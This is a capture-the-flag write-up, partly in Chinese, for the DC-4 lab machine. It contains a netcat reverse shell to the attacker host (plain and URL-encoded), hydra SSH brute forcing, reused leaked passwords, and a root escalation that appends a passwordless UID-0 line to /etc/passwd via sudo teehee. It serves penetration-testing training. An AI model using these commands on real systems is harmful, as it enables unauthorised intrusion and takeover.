Note that unauthorized infiltration is illegal, and the attacks here are all official drones.
foreword
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
1. Prerequisites
Attack aircraft: Kali
IP address: 192.168.9.128
Target machine: DC-4 (linux)
IP address: 192.168.9.131
DC-4 download link: http://www.five86.com/downloads/DC-4.zip
Network: The two hosts must be in the same LAN, so the network configurators of the virtual machines must be the same (NAT or bridge)
Goal: find the flag
2. Penetration attack
1. Idea
Penetration testing must have ideas, my idea is:
Information collection—> Find vulnerabilities—> Exploit vulnerabilities (sql injection, file upload vulnerabilities, framework vulnerabilities, ssh attacks, etc.)—> Rebound shell—>Privilege escalation
2. Infiltration process
2.1 Information Collection
We first use the netdiscover tool to discover active hosts through ARP scanning.
netdiscover -r 192.168.9.0/24
We found the ip address of the target machine: 192.168.9.131, and then we used the nmap tool to scan the port for specific information.
nmap -sT -O 192.168.9.131
We found that the target machine has opened port 80 and port 22, which correspond to http service and ssh service respectively, that is, there is a website, let's go to the webpage to check it first.
We found the login page, and we did a directory scan and fingerprint first to see if there were any clues.
dirsearch -u http://192.168.9.131
The directory scan did not find any other suspicious and useful web pages. Let's check his website framework to see if we can start with the framework.
whatweb http://192.168.9.131/
2.2 Vulnerability discovery
The framework used by this website was not found, let's bp grab the package and take a look.
After discovering the username and password we entered, I thought it was time to blast, so I took out my treasured dictionary.
We ran out the username and password, and saw what it looked like after logging in.
Username: admin
Password: happy
After seeing this page, I can roughly guess that this is an arbitrary command execution vulnerability, and I can prove it by grabbing a package.
Sure enough, we found out that any command was executed, so we reversed the shell, and we continued with the old three (catch, modify, and release).
攻击机:
nc -lvp 9999
客户机:
nc -e /bin/bash 192.168.9.128 9999 
After uploading, it was found that there was no connection. It may be that bp failed to upload. We encoded and uploaded, so I used bp's own encoding tool to encode and upload.
%6e%63%20%2d%65%20%2f%62%69%6e%2f%62%61%73%68%20%31%39%32%2e%31%36%38%2e%39%2e%31%32%38%20%39%39%39%39%20
So we found that the rebound has been successful, we have obtained the shell permission, and we are doing j interactive shell.
python -c 'import pty;pty.spawn("/bin/bash")'
Already got the interactive shell.
2.3 Escalation of rights
whoami
id
I found that the permissions are not enough, I searched for clues, and found that there are three users in the home directory, and there are clues under the jim user.
cd /home
ls
cd jim
ls
cat text.sh
cd backups
ls
cat old-passwords.bak
If you find the old password, take it down first and save it.
vim password.bak
Reminiscent of the previous 22-port ssh service, I think it can be blasted.
hydra -l jim -P password.bak -t 32 ssh://192.168.9.131:22
It is found that the password can be blasted out for ssh connection.
Username: Jim
Password: jibril04
whoami
id
sudo -l
It is found that there is still no permission, and it is found that the above tells jim that there is a letter, we will check it (generally the mail will be stored in the var directory).
cd /var/mail
cat jim
Discovered Charles' password (direct mailed, what a qualified employee), and we got into Charles' account.
Username: charles
Password: ^xHhA&hvim0y
su charles
ls
id
woami
sudo -l
It is found that this account has the authority of the teehee command, let's find out the function of this command.
To sum up, this command can add the last line of the file. If you find that this command has permission, you can escalate the privilege.
We proceed with the add command.
(Why add to this file and command can see my Linux software installation & account permissions [2] article)
sudo teehee -a /etc/passwd
demo::0:0:::/bin/bash
Check the passwd file and find that the account has been added, so we jump directly to the demo under the new user.
su demo
id
whoamiIt is found that the user is already root.
So we use the find command to search for the flag globally and check it.
find / -name *flag.*
cat /etc/passwd
The flag was found under root.
3. Summary
Breakthrough process of DC-4 shooting range:
1. First of all, we carried out host discovery and scanned the website of the test machine for fingerprints, and found that it did not have any framework.
2. Then we carried out bp packet capture and found a brute force cracking vulnerability.
3. We entered the webpage and found a vulnerability to execute commands arbitrarily, rebounded the shell code, got the shell, and then used python to change to an interactive shell.
4. We first entered the html user, and the home user found the old password of jim, and then blasted ssh through the password, and found that charles’ email contained his password. After entering the charles user, he found that he had the teehee command authority, and passed this command , and finally mentioned the root authority, and found the flag in the root directory.